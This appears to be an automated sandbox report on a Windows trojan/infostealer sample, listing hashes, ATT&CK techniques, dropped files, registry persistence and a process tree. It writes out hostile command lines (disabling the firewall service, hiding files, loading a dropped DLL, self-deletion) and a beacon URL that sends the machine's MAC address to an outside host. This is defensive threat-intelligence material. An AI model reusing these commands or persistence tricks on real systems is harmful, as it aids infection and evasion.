joker | 414511c6a3497dc4b1c22cf57fa7a62d674f1c13a3f8ad34596b01d3bc7997fb

Analysis

max time kernel
152s
max time network
157s
platform
windows7_x64
resource
win7-20220901-en
resource tags

arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system
submitted
02-10-2022 23:16

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

414511c6a3497dc4b1c22cf57fa7a62d674f1c13a3f8ad34596b01d3bc7997fb.exe
Size

258KB
MD5

073a7a4183c3be2f8e17e330f7f14a3e
SHA1

1dccd1ea3b1f8cb85802a959100e28a03c69c88d
SHA256

414511c6a3497dc4b1c22cf57fa7a62d674f1c13a3f8ad34596b01d3bc7997fb
SHA512

c4dadb6da3825f1bc58f43d0979cb661ad8e276e3f7ee92bc1d75fac7ed58eca3dce5dbf657dc3131d8e80676021c2df9abf19b5caf8c69f70c890b244150de0
SSDEEP

6144:lhRpgKLfAX79/Gh++wSR284Z/azGN44XtjxwXiKEeDzwHk/Z7EUaXMal:D+Ls2n84ZCCNPtjxwXiKEenwHk/Zxaf

Score

10^/10

joker evasion infostealer persistence trojan

Malware Config

Signatures

joker
Joker is an Android malware that targets billing and SMS fraud.
infostealer trojan joker

Adds policy Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

tj01.exezhahss090213.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\run	tj01.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\run\10znq = "C:\\tj01.exe"	tj01.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\run\zhqbastart = "rundll32.exe C:\\Windows\\system\\zhnahsdf090213c.dll a16zhqb"	zhahss090213.exe

Drops file in Drivers directory 1 IoCs

Processes:

tj01.exe

description ioc process

File opened for modification C:\Windows\system32\drivers\etc\hosts tj01.exe
Executes dropped EXE 7 IoCs

Processes:

2.exetj01.exe1.exexx1215.exe02.exe1261.exezhahss090213.exe

pid process

1472 2.exe
1684 tj01.exe
588 1.exe
1372 xx1215.exe
524 02.exe
1980 1261.exe
2352 zhahss090213.exe
Sets file to hidden 1 TTPs 3 IoCs
Modifies file attributes to stop it showing in Explorer etc.
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exeattrib.exeattrib.exe

pid process

1436 attrib.exe
2248 attrib.exe
2272 attrib.exe
Loads dropped DLL 8 IoCs

Processes:

rundll32.execmd.exezhahss090213.exe

pid process

2244 rundll32.exe
2244 rundll32.exe
2244 rundll32.exe
2244 rundll32.exe
2676 cmd.exe
2676 cmd.exe
2352 zhahss090213.exe
2352 zhahss090213.exe

description	ioc	process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	tj01.exe

pid	process
1472	2.exe
1684	tj01.exe
588	1.exe
1372	xx1215.exe
524	02.exe
1980	1261.exe
2352	zhahss090213.exe

pid	process
1436	attrib.exe
2248	attrib.exe
2272	attrib.exe

pid	process
2244	rundll32.exe
2244	rundll32.exe
2244	rundll32.exe
2244	rundll32.exe
2676	cmd.exe
2676	cmd.exe
2352	zhahss090213.exe
2352	zhahss090213.exe

Drops file in Windows directory 8 IoCs

Processes:

attrib.exeattrib.exetj01.exezhahss090213.exexx1215.exe

description	ioc	process
File opened for modification	C:\Windows\system\zhahss090213.exe	attrib.exe
File opened for modification	C:\Windows\system\zhnahsdf090213c.dll	attrib.exe
File opened for modification	C:\Windows\win.ini	tj01.exe
File opened for modification	C:\Windows\system\nbhsyh32b.dll	zhahss090213.exe
File created	C:\Windows\system\zhahss090213.exe	xx1215.exe
File opened for modification	C:\Windows\system\zhahss090213.exe	xx1215.exe
File created	C:\Windows\system\zhnahsdf090213c.dll	xx1215.exe
File opened for modification	C:\Windows\system\zhnahsdf090213c.dll	xx1215.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

NSIS installer 4 IoCs

installer

Processes:

resource	yara_rule
C:\2.exe	nsis_installer_2
C:\2.exe	nsis_installer_2
C:\1.exe	nsis_installer_2
C:\1.exe	nsis_installer_2

Modifies Internet Explorer settings 1 TTPs 60 IoCs

adware spyware

Modify Registry

T1112

Processes:

iexplore.exeIEXPLORE.EXE

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\DOMStorage\qqvip-10.com	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{A38E1501-42CD-11ED-809F-FE8152C730B7} = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\DOMStorage\www.qqvip-10.com\ = "63"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\International\CpMRU\Factor = "20"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "371274425"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\International\CpMRU\Size = "10"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000048ca5449a4d21846ba8a995ea0abd35a00000000020000000000106600000001000020000000f44a506196c825833bca76807ff70e356413f765ea6b3ce179509def43f53319000000000e80000000020000200000003370d185b2a84bc0c49c6d28a2b6d0a4b02be7bd09bad2bd07c1a1c11a400a1720000000e48798e0c6bb2dd7a16ff003680eac386127a3c24b1d52d62761f325ad6bf1ac400000003366561babd82fc93365ab9ddee8e23f95141ce7e0502b5d6825686bf149291ac8db2ede20e3ccf08849957b964cff88f18ba09fcfa4c197c616918037f04f94	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\DOMStorage\mgy1.tv	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "252"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\DOMStorage\www.qqvip-10.com	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\DOMStorage\www.qqvip-10.com\ = "126"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\DOMStorage\qqvip-10.com\Total = "63"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\DOMStorage\mgy1.tv\NumberOfSubdomains = "1"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\International\CpMRU\Enable = "1"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\DOMStorage\mgy1.tv\Total = "63"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\DOMStorage	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\DOMStorage\qqvip-10.com\NumberOfSubdomains = "1"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\DOMStorage\qqvip-10.com\Total = "126"	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\DOMStorage\qqvip-10.com\Total = "189"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000048ca5449a4d21846ba8a995ea0abd35a00000000020000000000106600000001000020000000e71256c13d1ed9f2e6249da33e1b360c48f418d674a8059650ed8588f4227d46000000000e80000000020000200000004980498314717eebbeb50e0a8aa72e50b91e7ee108466647735e1e69622a3a1790000000ca3779fee26dc5995b22ed95e7c56acbbf9baa3a81a21663c32b7e62730e96beb0067e89c1c6163e38f0fa9db7233aecf4a99d7200082ad574491be27398ad3991911fa8a14dd491c08381599db9f437a3e904779a95b05b702df6d81fd7fdefa6f7b1a08c6308137f13cfeed19bdfed8e9802bd7d10e5691d356e82c9c7e5ab54992f415cde9e62320f4e1e357c4c174000000073da567e102a73ed3ddfaee61363ef67c0d7b4c02eba3358d4761409d4c24a12461d7af7559c2dec8c3abe4d1a9bce883e644a5a4d1ef4df007241d3d8662822	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "63"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\DOMStorage\www.qqvip-10.com\ = "189"	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = f006820d7fd4d801	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\International\CpMRU	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "189"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\DOMStorage\mgy1.tv\ = "63"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\International\CpMRU\InitHits = "100"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "126"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 12 IoCs

Processes:

tj01.exexx1215.exe1261.exe02.exezhahss090213.exe

pid	process
1684	tj01.exe
1684	tj01.exe
1684	tj01.exe
1372	xx1215.exe
1980	1261.exe
524	02.exe
1372	xx1215.exe
2352	zhahss090213.exe
2352	zhahss090213.exe
1684	tj01.exe
2352	zhahss090213.exe
2352	zhahss090213.exe

Suspicious use of AdjustPrivilegeToken 14 IoCs

Processes:

tj01.exexx1215.exe1261.exe02.exezhahss090213.exeAUDIODG.EXE

description	pid	process
Token: SeDebugPrivilege	1684	tj01.exe
Token: SeDebugPrivilege	1372	xx1215.exe
Token: SeDebugPrivilege	1980	1261.exe
Token: SeSystemtimePrivilege	1372	xx1215.exe
Token: SeSystemtimePrivilege	1980	1261.exe
Token: SeDebugPrivilege	524	02.exe
Token: SeSystemtimePrivilege	1372	xx1215.exe
Token: SeDebugPrivilege	2352	zhahss090213.exe
Token: SeDebugPrivilege	2352	zhahss090213.exe
Token: 33	2736	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	2736	AUDIODG.EXE
Token: 33	2736	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	2736	AUDIODG.EXE
Token: SeDebugPrivilege	2352	zhahss090213.exe

Suspicious use of FindShellTrayWindow 23 IoCs

Processes:

iexplore.exetj01.exe

pid	process
1840	iexplore.exe
1684	tj01.exe
1684	tj01.exe
1684	tj01.exe
1684	tj01.exe
1684	tj01.exe
1684	tj01.exe
1684	tj01.exe
1684	tj01.exe
1684	tj01.exe
1684	tj01.exe
1684	tj01.exe
1684	tj01.exe
1684	tj01.exe
1684	tj01.exe
1684	tj01.exe
1684	tj01.exe
1684	tj01.exe
1684	tj01.exe
1684	tj01.exe
1684	tj01.exe
1684	tj01.exe
1684	tj01.exe

Suspicious use of SendNotifyMessage 21 IoCs

Processes:

tj01.exe

pid	process
1684	tj01.exe
1684	tj01.exe
1684	tj01.exe
1684	tj01.exe
1684	tj01.exe
1684	tj01.exe
1684	tj01.exe
1684	tj01.exe
1684	tj01.exe
1684	tj01.exe
1684	tj01.exe
1684	tj01.exe
1684	tj01.exe
1684	tj01.exe
1684	tj01.exe
1684	tj01.exe
1684	tj01.exe
1684	tj01.exe
1684	tj01.exe
1684	tj01.exe
1684	tj01.exe

Suspicious use of SetWindowsHookEx 9 IoCs

Processes:

02.exeiexplore.exeIEXPLORE.EXE

pid process

524 02.exe
524 02.exe
524 02.exe
1840 iexplore.exe
1840 iexplore.exe
2032 IEXPLORE.EXE
2032 IEXPLORE.EXE
2032 IEXPLORE.EXE
2032 IEXPLORE.EXE

pid	process
524	02.exe
524	02.exe
524	02.exe
1840	iexplore.exe
1840	iexplore.exe
2032	IEXPLORE.EXE
2032	IEXPLORE.EXE
2032	IEXPLORE.EXE
2032	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

414511c6a3497dc4b1c22cf57fa7a62d674f1c13a3f8ad34596b01d3bc7997fb.exe2.exetj01.exe1.exeiexplore.exe

description	pid	process	target process
PID 1524 wrote to memory of 1472	1524	414511c6a3497dc4b1c22cf57fa7a62d674f1c13a3f8ad34596b01d3bc7997fb.exe	2.exe
PID 1524 wrote to memory of 1472	1524	414511c6a3497dc4b1c22cf57fa7a62d674f1c13a3f8ad34596b01d3bc7997fb.exe	2.exe
PID 1524 wrote to memory of 1472	1524	414511c6a3497dc4b1c22cf57fa7a62d674f1c13a3f8ad34596b01d3bc7997fb.exe	2.exe
PID 1524 wrote to memory of 1472	1524	414511c6a3497dc4b1c22cf57fa7a62d674f1c13a3f8ad34596b01d3bc7997fb.exe	2.exe
PID 1524 wrote to memory of 1472	1524	414511c6a3497dc4b1c22cf57fa7a62d674f1c13a3f8ad34596b01d3bc7997fb.exe	2.exe
PID 1524 wrote to memory of 1472	1524	414511c6a3497dc4b1c22cf57fa7a62d674f1c13a3f8ad34596b01d3bc7997fb.exe	2.exe
PID 1524 wrote to memory of 1472	1524	414511c6a3497dc4b1c22cf57fa7a62d674f1c13a3f8ad34596b01d3bc7997fb.exe	2.exe
PID 1524 wrote to memory of 1684	1524	414511c6a3497dc4b1c22cf57fa7a62d674f1c13a3f8ad34596b01d3bc7997fb.exe	tj01.exe
PID 1524 wrote to memory of 1684	1524	414511c6a3497dc4b1c22cf57fa7a62d674f1c13a3f8ad34596b01d3bc7997fb.exe	tj01.exe
PID 1524 wrote to memory of 1684	1524	414511c6a3497dc4b1c22cf57fa7a62d674f1c13a3f8ad34596b01d3bc7997fb.exe	tj01.exe
PID 1524 wrote to memory of 1684	1524	414511c6a3497dc4b1c22cf57fa7a62d674f1c13a3f8ad34596b01d3bc7997fb.exe	tj01.exe
PID 1524 wrote to memory of 1684	1524	414511c6a3497dc4b1c22cf57fa7a62d674f1c13a3f8ad34596b01d3bc7997fb.exe	tj01.exe
PID 1524 wrote to memory of 1684	1524	414511c6a3497dc4b1c22cf57fa7a62d674f1c13a3f8ad34596b01d3bc7997fb.exe	tj01.exe
PID 1524 wrote to memory of 1684	1524	414511c6a3497dc4b1c22cf57fa7a62d674f1c13a3f8ad34596b01d3bc7997fb.exe	tj01.exe
PID 1472 wrote to memory of 588	1472	2.exe	1.exe
PID 1472 wrote to memory of 588	1472	2.exe	1.exe
PID 1472 wrote to memory of 588	1472	2.exe	1.exe
PID 1472 wrote to memory of 588	1472	2.exe	1.exe
PID 1472 wrote to memory of 588	1472	2.exe	1.exe
PID 1472 wrote to memory of 588	1472	2.exe	1.exe
PID 1472 wrote to memory of 588	1472	2.exe	1.exe
PID 1472 wrote to memory of 1372	1472	2.exe	xx1215.exe
PID 1472 wrote to memory of 1372	1472	2.exe	xx1215.exe
PID 1472 wrote to memory of 1372	1472	2.exe	xx1215.exe
PID 1472 wrote to memory of 1372	1472	2.exe	xx1215.exe
PID 1472 wrote to memory of 1372	1472	2.exe	xx1215.exe
PID 1472 wrote to memory of 1372	1472	2.exe	xx1215.exe
PID 1472 wrote to memory of 1372	1472	2.exe	xx1215.exe
PID 1684 wrote to memory of 864	1684	tj01.exe	attrib.exe
PID 1684 wrote to memory of 864	1684	tj01.exe	attrib.exe
PID 1684 wrote to memory of 864	1684	tj01.exe	attrib.exe
PID 1684 wrote to memory of 864	1684	tj01.exe	attrib.exe
PID 1684 wrote to memory of 864	1684	tj01.exe	attrib.exe
PID 1684 wrote to memory of 864	1684	tj01.exe	attrib.exe
PID 1684 wrote to memory of 864	1684	tj01.exe	attrib.exe
PID 588 wrote to memory of 524	588	1.exe	02.exe
PID 588 wrote to memory of 524	588	1.exe	02.exe
PID 588 wrote to memory of 524	588	1.exe	02.exe
PID 588 wrote to memory of 524	588	1.exe	02.exe
PID 588 wrote to memory of 524	588	1.exe	02.exe
PID 588 wrote to memory of 524	588	1.exe	02.exe
PID 588 wrote to memory of 524	588	1.exe	02.exe
PID 588 wrote to memory of 1980	588	1.exe	1261.exe
PID 588 wrote to memory of 1980	588	1.exe	1261.exe
PID 588 wrote to memory of 1980	588	1.exe	1261.exe
PID 588 wrote to memory of 1980	588	1.exe	1261.exe
PID 588 wrote to memory of 1980	588	1.exe	1261.exe
PID 588 wrote to memory of 1980	588	1.exe	1261.exe
PID 588 wrote to memory of 1980	588	1.exe	1261.exe
PID 1684 wrote to memory of 1436	1684	tj01.exe	attrib.exe
PID 1684 wrote to memory of 1436	1684	tj01.exe	attrib.exe
PID 1684 wrote to memory of 1436	1684	tj01.exe	attrib.exe
PID 1684 wrote to memory of 1436	1684	tj01.exe	attrib.exe
PID 1684 wrote to memory of 1436	1684	tj01.exe	attrib.exe
PID 1684 wrote to memory of 1436	1684	tj01.exe	attrib.exe
PID 1684 wrote to memory of 1436	1684	tj01.exe	attrib.exe
PID 1684 wrote to memory of 1840	1684	tj01.exe	iexplore.exe
PID 1684 wrote to memory of 1840	1684	tj01.exe	iexplore.exe
PID 1684 wrote to memory of 1840	1684	tj01.exe	iexplore.exe
PID 1684 wrote to memory of 1840	1684	tj01.exe	iexplore.exe
PID 1840 wrote to memory of 2032	1840	iexplore.exe	IEXPLORE.EXE
PID 1840 wrote to memory of 2032	1840	iexplore.exe	IEXPLORE.EXE
PID 1840 wrote to memory of 2032	1840	iexplore.exe	IEXPLORE.EXE
PID 1840 wrote to memory of 2032	1840	iexplore.exe	IEXPLORE.EXE

Views/modifies file attributes 1 TTPs 4 IoCs
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exeattrib.exeattrib.exeattrib.exe

pid process

864 attrib.exe
1436 attrib.exe
2248 attrib.exe
2272 attrib.exe

pid	process
864	attrib.exe
1436	attrib.exe
2248	attrib.exe
2272	attrib.exe

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:1360

C:\Users\Admin\AppData\Local\Temp\414511c6a3497dc4b1c22cf57fa7a62d674f1c13a3f8ad34596b01d3bc7997fb.exe
"C:\Users\Admin\AppData\Local\Temp\414511c6a3497dc4b1c22cf57fa7a62d674f1c13a3f8ad34596b01d3bc7997fb.exe"
2⤵
- Suspicious use of WriteProcessMemory
PID:1524

C:\2.exe
"C:\2.exe"
3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1472

C:\1.exe
"C:\1.exe"
4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:588

C:\02.exe
"C:\02.exe"
5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:524

C:\Windows\SysWOW64\net.exe
net stop sharedaccess
6⤵
PID:1140

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop sharedaccess
7⤵
PID:1544

C:\1261.exe
"C:\1261.exe"
5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1980

C:\xx1215.exe
"C:\xx1215.exe"
4⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1372

C:\Windows\SysWOW64\attrib.exe
attrib +s +h "C:\Windows\system\zhahss090213.exe"
5⤵
- Sets file to hidden
- Drops file in Windows directory
- Views/modifies file attributes
PID:2248

C:\Windows\SysWOW64\attrib.exe
attrib +s +h "C:\Windows\system\zhnahsdf090213c.dll"
5⤵
- Sets file to hidden
- Drops file in Windows directory
- Views/modifies file attributes
PID:2272

C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Windows\system\zhnahsdf090213c.dll a16zhqb
5⤵
- Loads dropped DLL
PID:2244

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c "c:\zhqbdf16d.bat"
6⤵
- Loads dropped DLL
PID:2676

C:\Windows\system\zhahss090213.exe
"C:\Windows\system\zhahss090213.exe" i
7⤵
- Adds policy Run key to start application
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2352

C:\Windows\SysWOW64\cmd.exe
cmd /c del "C:\xx1215.exe"
5⤵
PID:2284

C:\tj01.exe
"C:\tj01.exe"
3⤵
- Adds policy Run key to start application
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1684

C:\Windows\SysWOW64\attrib.exe
attrib -s -h "C:\Windows\system32\drivers\etc\hosts"
4⤵
- Views/modifies file attributes
PID:864

C:\Windows\SysWOW64\attrib.exe
attrib +s +h "C:\Windows\system32\drivers\etc\hosts"
4⤵
- Sets file to hidden
- Views/modifies file attributes
PID:1436

C:\program files\internet explorer\iexplore.exe
"C:\program files\internet explorer\iexplore.exe" "http://qqvip-10.com/tj01/install.asp?ver=090215&tgid=tj01&address=FE-81-52-C7-30-B7&regk=1&flag=406e699b8bf32e409b93d78c1b2ab7c8&frandom=9607"
4⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1840

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1840 CREDAT:275457 /prefetch:2
5⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:2032

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x1b0
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2736

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Hidden Files and Directories

T1158

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Hidden Files and Directories

T1158

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\02.exe
Filesize
52KB

MD5
891885d3ed7e9785732118716369f8a5

SHA1
400c5ad16051202257910dc74d6133f5c9172bd3

SHA256
00225a54fc6ac7fe41af9bd1f338ef4eaf18c429d1cd7023c09e0755a2fe250d

SHA512
377d4bc5bf9dc6f87246b0ea81e4a586272a0c041780e9b05a54a31fb064f8fbdf184032ad33b4ccffe4be1f58d8dbd6c910131d20dd228d3d5634a27122456b

Download Submit
C:\02.exe
Filesize
52KB

MD5
891885d3ed7e9785732118716369f8a5

SHA1
400c5ad16051202257910dc74d6133f5c9172bd3

SHA256
00225a54fc6ac7fe41af9bd1f338ef4eaf18c429d1cd7023c09e0755a2fe250d

SHA512
